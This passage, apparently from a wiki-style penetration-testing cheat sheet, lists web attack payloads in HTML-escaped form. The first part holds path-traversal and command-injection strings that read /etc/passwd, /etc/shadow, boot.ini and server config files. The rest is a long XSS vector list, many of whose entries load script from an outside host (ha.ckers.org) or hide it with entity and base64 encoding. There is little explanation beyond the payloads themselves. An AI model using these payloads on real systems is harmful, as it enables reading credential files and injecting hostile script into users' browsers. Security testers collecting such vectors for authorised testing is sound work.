%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
